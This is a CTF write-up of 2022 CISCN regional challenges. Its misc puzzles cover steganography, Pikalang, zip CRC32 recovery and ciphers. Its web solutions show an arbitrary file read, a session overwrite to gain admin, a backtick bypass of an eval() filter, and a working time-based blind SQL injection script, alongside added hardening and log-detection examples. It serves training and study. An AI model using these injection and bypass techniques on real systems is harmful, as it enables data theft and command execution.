2022 CISCN East China North (华东北) Regional: Challenge Reproduction


pikachu

Viewing the image in Stegsolve reveals LSB steganography: the red, blue and green channels carry an encoded string. Running zsteg over it in one go should work here too.


It looks like base64; decoding it gives:

pi pi pi pi pi pi pi pi pi pi pika pipi pi pipi pi pi pi pipi pi pi pi pi pi pi pi pipi pi pi pi pi pi pi pi pi pi pi pichu pichu pichu pichu ka chu pipi pipi pipi pipi pi pi pikachu pi pi pi pi pi pi pikachu ka ka ka ka ka ka ka ka ka ka ka pikachu pi pi pi pi pi pi pikachu pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pikachu ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka pikachu pichu ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka pikachu ka ka ka ka pikachu pi pi pikachu pi pi pikachu pipi pikachu pichu ka ka ka ka ka pikachu pipi pi pi pikachu pichu pi pi pi pikachu ka ka ka pikachu pipi pikachu ka ka ka ka ka pikachu pi pi pi pikachu pichu ka pikachu pi pi pi pikachu ka pikachu pipi pi pikachu pikachu pichu pi pikachu ka ka ka pikachu pi pikachu pi pi pi pi pi pi pi pi pikachu ka ka ka ka ka ka pikachu pipi pi pikachu pichu pikachu pipi ka ka ka ka ka pikachu pi pi pi pi pi pikachu pichu ka ka pikachu pi pi pi pi pikachu ka pikachu ka ka ka ka pikachu pi pi pi pi pi pi pi pi pikachu pipi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pikachu 

Decode the pi / ka / chu (Pikalang) program with:
https://www.dcode.fr/pikalang-language
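Instead of pasting the program into the web decoder, the decoding can be done locally. The block below is an added example, not code from the original post: a Pikalang-to-Brainfuck translator plus a small Brainfuck interpreter. The token table is the standard Pikalang mapping (`pi`/`ka` increment and decrement, `pipi`/`pichu` move the pointer, `pikachu`/`pikapi` output and input, `pika`/`chu` open and close a loop), and `PROGRAM` is the string recovered from the image above.

```python
# Added example (not from the original post): run the recovered Pikalang
# program locally. Pikalang is Brainfuck with Pokemon-sound tokens.

# Standard Pikalang token table.
PIKALANG = {
    "pi": "+", "ka": "-", "pipi": ">", "pichu": "<",
    "pikachu": ".", "pikapi": ",", "pika": "[", "chu": "]",
}

# The program recovered from the image's LSB channels (copied from the post).
PROGRAM = (
    "pi pi pi pi pi pi pi pi pi pi pika pipi pi pipi pi pi pi pipi pi pi pi pi pi pi pi pipi pi pi pi pi pi pi pi pi pi pi pichu pichu pichu pichu ka chu pipi pipi pipi pipi pi pi pikachu pi pi pi pi pi pi pikachu ka ka ka ka ka ka ka ka ka ka ka pikachu pi pi pi pi pi pi pikachu pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pikachu ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka pikachu pichu ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka ka pikachu ka ka ka ka pikachu pi pi pikachu pi pi pikachu pipi pikachu pichu ka ka ka ka ka pikachu pipi pi pi pikachu pichu pi pi pi pikachu ka ka ka pikachu pipi pikachu ka ka ka ka ka pikachu pi pi pi pikachu pichu ka pikachu pi pi pi pikachu ka pikachu pipi pi pikachu pikachu pichu pi pikachu ka ka ka pikachu pi pikachu pi pi pi pi pi pi pi pi pikachu ka ka ka ka ka ka pikachu pipi pi pikachu pichu pikachu pipi ka ka ka ka ka pikachu pi pi pi pi pi pikachu pichu ka ka pikachu pi pi pi pi pikachu ka pikachu ka ka ka ka pikachu pi pi pi pi pi pi pi pi pikachu pipi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pi pikachu"
)


def pikalang_to_bf(src):
    """Translate whitespace-separated Pikalang tokens into Brainfuck."""
    try:
        return "".join(PIKALANG[tok] for tok in src.split())
    except KeyError as exc:
        raise ValueError("unknown Pikalang token %r" % exc.args[0]) from None


def run_bf(code, stdin=b""):
    """Small Brainfuck interpreter: 8-bit wrapping cells on a growable tape."""
    # Pre-compute matching brackets so loop jumps are O(1).
    jump, stack = {}, []
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError("unbalanced ']' at %d" % pos)
            start = stack.pop()
            jump[start], jump[pos] = pos, start
    if stack:
        raise ValueError("unbalanced '['")
    tape, ptr, pc = [0], 0, 0
    inp, out = list(stdin), bytearray()
    while pc < len(code):
        ch = code[pc]
        if ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ">":
            ptr += 1
            if ptr == len(tape):
                tape.append(0)
        elif ch == "<":
            if ptr == 0:
                raise IndexError("tape pointer moved left of cell 0")
            ptr -= 1
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = inp.pop(0) if inp else 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return out.decode("latin-1")


def run_pikalang(src, stdin=b""):
    """Translate and execute a Pikalang program, returning its output."""
    return run_bf(pikalang_to_bf(src), stdin)


if __name__ == "__main__":
    print(run_pikalang(PROGRAM))
```

The first loop (`pika ... chu`) is the usual Brainfuck idiom that seeds four cells with 10, 30, 70 and 100; the rest of the program nudges cells 3 and 4 up and down by a few units to emit hex digits and letters, which is why the output is a `flag{...}` string of 32 hex characters.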

snowberg

Opening it in 010 Editor shows a CRC error, and there is an AES-encrypted string inside:

U2FsdGVkX1+mMxrc0YkGvTaB0c3A9EgFWvjghqa8j+J4vs0SO8q4qXO+OfKOIih+zOwLBe64L23McubUTe1dxA==

Without the key it cannot be decrypted, though.
Running zsteg afterwards reveals LSB steganography containing an archive; save the bin.

Four files, all password-protected. Having done similar challenges before, we can brute-force them via CRC32.
Script:
https://github.com/theonlypwner/crc32
Brute-forcing each file in turn gives the key:

y0u_f0und_th1s_k3y

Just decode it.
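The attack relies on the fact that a traditionally encrypted zip still stores each member's plaintext CRC-32 in the (unencrypted) headers, so a tiny member can be recovered from its checksum alone. The block below is an added example, not the post's code and not the theonlypwner/crc32 script linked above: for members of exactly 4 bytes it inverts CRC-32 directly (the top byte of each CRC table entry is unique, so the state can be walked backwards one byte at a time), and for shorter members it falls back to a printable brute force. The archive and its four fragments are constructed for the demo.

```python
# Added example (not from the original post): recover tiny zip members from
# the CRC-32 values stored in the archive headers.
import io
import itertools
import string
import zipfile
import zlib

POLY = 0xEDB88320  # reflected CRC-32 polynomial used by zip and zlib


def _make_table():
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ POLY if c & 1 else c >> 1
        table.append(c)
    return table


TABLE = _make_table()
# Every table entry has a distinct top byte, so the top byte of a CRC state
# identifies the table index that produced it; that is what lets us walk back.
REV_TOP = {entry >> 24: i for i, entry in enumerate(TABLE)}
assert len(REV_TOP) == 256


def crc32_reverse_4(target):
    """Return the unique 4-byte string whose CRC-32 equals `target` (no search)."""
    state = target ^ 0xFFFFFFFF  # undo the final XOR
    idx = [0] * 4
    for i in range(3, -1, -1):  # recover each step's table index, last byte first
        idx[i] = REV_TOP[state >> 24]
        state = ((state ^ TABLE[idx[i]]) << 8) & 0xFFFFFFFF
    state, out = 0xFFFFFFFF, bytearray()  # replay forwards to turn indices into bytes
    for i in range(4):
        out.append((idx[i] ^ state) & 0xFF)
        state = TABLE[idx[i]] ^ (state >> 8)
    return bytes(out)


PRINTABLE = string.printable.strip().encode()  # 94 printable ASCII characters


def crc32_bruteforce(target, length, alphabet=PRINTABLE):
    """Exhaustive search for short members (1-3 bytes of printable text)."""
    for cand in itertools.product(alphabet, repeat=length):
        b = bytes(cand)
        if zlib.crc32(b) == target:
            return b
    return None


def recover_member(info):
    """Recover one member's plaintext from the CRC in its zip header."""
    if info.file_size == 4:
        return crc32_reverse_4(info.CRC)
    if 1 <= info.file_size <= 3:
        return crc32_bruteforce(info.CRC, info.file_size)
    return None  # longer members: too large for a plain brute force


def recover_all(zip_bytes):
    """Recover every member of an in-memory archive, in archive order."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [recover_member(info) for info in zf.infolist()]


def build_sample_zip():
    """Constructed stand-in for the challenge archive: four tiny members."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in [("1.txt", b"y0u_"), ("2.txt", b"f0un"),
                           ("3.txt", b"d_th"), ("4.txt", b"1s_")]:
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    print(b"".join(recover_all(build_sample_zip())))
```

Two caveats for real archives: the CRC field is only the plaintext checksum under traditional PKZIP encryption (WinZip AES members store 0 there), and for members longer than 4 bytes the checksum no longer pins down the content, so the search has to be narrowed with a charset or a dictionary.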

old

Base decode, then rot13, then a W-type rail fence with 3 rails.
Just run it through in one go.
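For readers who prefer a script over an online tool, the block below is an added example (not the post's code) that implements the same three-step pipeline. It assumes "base" means base64 and that the steps are undone in the order listed: base64, then rot13, then the zig-zag rail fence with 3 rails; the matching encoder and the sample plaintext are constructed for a round-trip check.

```python
# Added example (not from the original post): undo base64 -> rot13 -> rail fence.
import base64
import codecs


def _rail_pattern(length, rails):
    """Rail index visited by each plaintext position in the W (zig-zag) pattern."""
    pattern, rail, step = [], 0, 1
    for _ in range(length):
        pattern.append(rail)
        if rails > 1:
            if rail == 0:
                step = 1
            elif rail == rails - 1:
                step = -1
            rail += step
    return pattern


def rail_fence_encrypt(plain, rails=3):
    """Read the zig-zag rail by rail, top to bottom."""
    pattern = _rail_pattern(len(plain), rails)
    return "".join(ch for r in range(rails)
                   for ch, pr in zip(plain, pattern) if pr == r)


def rail_fence_decrypt(cipher, rails=3):
    """Place ciphertext characters back onto the rails, then read left to right."""
    pattern = _rail_pattern(len(cipher), rails)
    result, it = [None] * len(cipher), iter(cipher)
    for r in range(rails):
        for i, pr in enumerate(pattern):
            if pr == r:
                result[i] = next(it)
    return "".join(result)


def encode_old(plain):
    """Constructed encoder mirroring the challenge pipeline (for testing)."""
    fenced = rail_fence_encrypt(plain, 3)
    rotated = codecs.encode(fenced, "rot_13")
    return base64.b64encode(rotated.encode()).decode()


def decode_old(token):
    """Undo the pipeline: base64, then rot13, then 3-rail W-type rail fence."""
    rotated = base64.b64decode(token).decode()
    fenced = codecs.decode(rotated, "rot_13")
    return rail_fence_decrypt(fenced, 3)


if __name__ == "__main__":
    sample = encode_old("ciscn{r4il_f3nc3}")  # constructed sample
    print(sample, "->", decode_old(sample))
```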

welcomeToCiscn

Press F12 and view the page source for the flag; it sits under the /flag directory.

The chatty CTF bot (会聊天的ctf机器人)

The `image` action is an arbitrary file read; use it to read the api.php source:

```php
<?php
init();

function init(){
    // Sessions are stored as plain files under /tmp/session
    $sesspath = "/tmp/session";
    session_save_path($sesspath);
    session_start();
    if (!$_SESSION['cname'])
        $_SESSION['cname'] = 'ck';
    if(!file_dir_exists("/tmp/resource"))
        mkdir("/tmp/resource");
}

function file_dir_exists($path){
    $dir = dir($path);
    if ($dir)
        if ($dir->read())
            return true;
    return is_file($path);
}

function getres($input){
    log_write($input);
    chdir("/tmp/resource/");
    // The word bank to load is whatever name the session holds
    $path = $_SESSION['cname'];
    if(!file_dir_exists($path)){
        return "请先上传词库文件。";
    }
    $ck = json_decode(file_get_contents($path),true);
    foreach ($ck as $key => $value){
        if (strstr($key,$input) or strstr($input,$key)){
            $type = key($value);
            $v = $value[$type];
            switch ($type){
                case "string":
                    return $v;
                case "image":
                    // Reads any path named in the word bank: arbitrary file read
                    $b64img = '<img src="data:image/png;base64,'.base64_encode(file_get_contents($v)) . '"/>';
                    return $b64img;
                case "calc":
                    if ($_SESSION['is_admin']){
                        // Only parentheses and quotes are blocked before eval()
                        if (preg_match("/\(|\)|\'|\"/im",$v)){
                            return "包含非法字符";
                        }
                        return eval("return $v;");
                    }else{
                        return "admin才能使用这个功能";
                    }
                default:
                    return "这个动作暂时还没能实现";
            }
        }
    }
    return "没有匹配到词库消息";
}

function uploadc(){
    $data = $_POST['uploadc'];
    $filename = $_POST['cname'];
    $resourcedir = "/tmp/resource/";
    if(!file_dir_exists($resourcedir))
        mkdir($resourcedir);
    // strpos() checks: a match at offset 0 is falsy and passes
    if(strpos($data,"<")){
        die("别这样！");
    }
    if(strpos($filename,".")){
        die("别这样！");
    }
    $_SESSION['cname'] = $filename;
    if(file_put_contents($resourcedir.$filename,$data)) {
        return "上传成功";
    }else{
        return "上传失败";
    }
}

function log_write($msg){
    $logpath = "log.txt";
    $oper = session_id();
    $opername = substr($oper,0,1) ;
    for ($i=0;$i <= strlen($oper);$i++)
        $opername .= "*";
    file_put_contents($logpath,"$opername : $msg \n",FILE_APPEND);
}

if(isset($_POST['input']))
    echo getres($_POST['input']);
if(isset($_POST['uploadc']))
    echo uploadc();
if(isset($_POST['clear']))
    file_put_contents("log.txt","");
if(isset($_GET['log']))
    echo file_get_contents("log.txt");
```

Use the upload to write the session file and gain admin.
The code-execution path filters parentheses and quotes; bypass it directly with backticks.
Then just run commands.
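The upload filter in `uploadc()` is the usual PHP `if(strpos(...))` pitfall: `strpos()` returns the match offset, and offset 0 is falsy, so a forbidden character in the very first position is treated as "not found". The block below is an added example, not part of the challenge or the post: a Python model of that weak check beside a hardened one (allowlist the name, test membership rather than offset, and confirm the resolved path stays under the resource directory), run over constructed inputs.

```python
# Added example (not from the original post): the weak strpos-style upload
# check from api.php modelled in Python, next to a hardened replacement.
import os
import re

RESOURCE_DIR = "/tmp/resource"  # directory name taken from api.php


def php_strpos_truthy(haystack, needle):
    """Model of PHP `if(strpos($h, $n))`: strpos returns the offset of the
    match and offset 0 is falsy, so a needle found at the first character is
    handled exactly like 'not found'."""
    return haystack.find(needle) > 0


def weak_upload_check(filename, data):
    """Mirrors uploadc(): reject only when strpos() is truthy."""
    if php_strpos_truthy(data, "<"):
        return False
    if php_strpos_truthy(filename, "."):
        return False
    return True


NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def hardened_upload_check(filename, data):
    """Membership test, allowlisted name, and a containment check on the
    resolved path (the last one catches anything the regex might miss)."""
    if "<" in data:
        return False
    if not NAME_RE.match(filename):
        return False
    base = os.path.realpath(RESOURCE_DIR)
    target = os.path.realpath(os.path.join(base, filename))
    return os.path.commonpath([base, target]) == base


# Constructed inputs: a legitimate word bank, then probes that put the
# forbidden character at offset 0, then one that the weak check does catch.
CASES = [
    ("words", '{"hi":{"string":"hello"}}'),
    ("words", '<img src=x>'),                    # '<' at offset 0
    (".hidden/../peer", '{"a":{"string":"b"}}'),  # '.' at offset 0, traversal inside
    ("bank.json", '{"a":{"string":"b"}}'),        # '.' at offset 4
]


def evaluate(cases=CASES):
    """Return [(filename, weak_accepts, hardened_accepts), ...]."""
    return [(name, weak_upload_check(name, data), hardened_upload_check(name, data))
            for name, data in cases]


if __name__ == "__main__":
    for row in evaluate():
        print(row)
```

The same fix applies to the `calc` branch: a denylist of characters in front of `eval()` is not a boundary, and the hardened form is to not evaluate user-controlled strings at all.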

ezsql

Error-based injection with no filtering at all. Note that the flag column lives in a database other than this site's, so the column name has to be quoted explicitly with backticks, otherwise it does not work.

```python
import requests

# Time-based blind extraction: when the guessed bound is above the real
# character MySQL runs sleep(1) and the request overruns the 2 s timeout.
url = 'http://192.168.166.131:58004/app/deleteaccount_status.php?account_status_number='
flag = ''
for i in range(1, 55):
    m = 32
    n = 127
    while 1:
        mid = (m + n) // 2
        # payload = "1'or if (ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))<{},sleep(1),0)%23".format(i, mid)  # ctfshow_flagxc,ctfshow_info
        # -> mysql,information_schema,performance_schema,sys,mims,f0ig_wdp435s

        # payload = "1'or if (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='f0ig_wdp435s'),{},1))<{},sleep(1),0)%23".format(i, mid)
        # -> account_status,account_type,accounts,customers,customers_sNpe,users

        # payload = "1'or if (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='fllaaagggg'),{},1))<{},sleep(1),0)%23".format(i, mid)
        # -> FI@g

        payload = "1'or if(ascii(substr((select `FI@g` from f0ig_wdp435s.fllaaagggg),{},1))<{},sleep(1),0)%23".format(i, mid)
        print(url + payload)
        try:
            r = requests.get(url=url + payload, timeout=2)
            m = mid  # answered in time: the character is >= mid
        except requests.exceptions.Timeout:
            n = mid  # slept: the character is < mid
        if m + 1 == n:
            flag += chr(m)
            print(flag)
            break
```
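From the defender's side, this script leaves a very recognisable trail: dozens of requests from one client whose parameter value contains a conditional `sleep()`, an `ascii(substr(...))` comparison and `information_schema` lookups. The block below is an added example, not part of the post: it parses combined-format access-log lines, URL-decodes each query parameter, matches those three signatures, and flags clients that sent repeated delayed-conditional probes. The log lines are constructed to look like the traffic the script above would generate.

```python
# Added example (not from the original post): spot time-based blind SQL
# injection probes in web access logs.
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Apache/nginx "combined" log line: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures matched against URL-decoded parameter values.
SIGNATURES = [
    ("time-based blind", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("char extraction", re.compile(r"\b(ascii|ord)\s*\(\s*(substr|substring|mid)\s*\(", re.I)),
    ("schema enumeration", re.compile(r"\binformation_schema\.", re.I)),
]


def inspect_line(line):
    """Return (client_ip, sorted matched signature names), or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = set()
    # parse_qsl percent-decodes values, so %27 / %20 / %23 become ' / space / #
    for _, value in parse_qsl(urlsplit(m["path"]).query, keep_blank_values=True):
        for name, pattern in SIGNATURES:
            if pattern.search(value):
                hits.add(name)
    return m["ip"], sorted(hits)


def summarize(lines):
    """Count signature hits per client address."""
    counts = defaultdict(lambda: defaultdict(int))
    for line in lines:
        parsed = inspect_line(line)
        if parsed is None:
            continue
        ip, hits = parsed
        for name in hits:
            counts[ip][name] += 1
    return {ip: dict(c) for ip, c in counts.items()}


def flag_sources(counts, threshold=3):
    """Clients that issued at least `threshold` delayed-conditional requests."""
    return sorted(ip for ip, c in counts.items()
                  if c.get("time-based blind", 0) >= threshold)


# Constructed sample: one ordinary request, then three probes shaped like the script.
PROBE = ('/app/deleteaccount_status.php?account_status_number=1%27or%20if(ascii(substr('
         '(select%20group_concat(schema_name)%20from%20information_schema.schemata),1,1))'
         '%3C{},sleep(1),0)%23')
SAMPLE_LOG = [
    '10.0.0.9 - - [12/Jun/2022:10:14:58 +0800] "GET /app/deleteaccount_status.php?'
    'account_status_number=17 HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
] + [
    '10.0.0.5 - - [12/Jun/2022:10:15:0%d +0800] "GET %s HTTP/1.1" 200 312 "-" '
    '"python-requests/2.28.1"' % (sec, PROBE.format(bound))
    for sec, bound in ((1, 100), (3, 80), (4, 90))
]


if __name__ == "__main__":
    counts = summarize(SAMPLE_LOG)
    print(counts)
    print("suspicious clients:", flag_sources(counts))
```

Because combined logs do not record response time, the signal here is the request shape; where the server logs latency as well, a run of requests alternating between ~0 s and ~1 s from the same client is the complementary indicator.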